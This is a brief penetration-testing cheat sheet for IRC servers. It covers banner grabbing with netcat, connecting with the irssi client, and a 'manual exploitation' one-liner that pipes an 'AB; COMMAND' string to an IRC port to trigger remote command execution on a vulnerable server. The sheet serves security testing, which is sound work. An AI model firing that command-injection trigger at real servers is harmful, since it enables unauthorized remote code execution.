Internet Relay Chat (IRC) Penetration Testing
Enumeration:
1) Netcat banner grabbing
nc -vn TARGET_IP PORT2) IRC Client (irssi)
irssi -c TARGET_IP --port PORTTIP: Depending on the IRC server version used, we may find exploits for RCE
1) Manual Exploitation
echo 'AB; COMMAND' | nc TARGET_IP IRC_PORT (Example)Last updated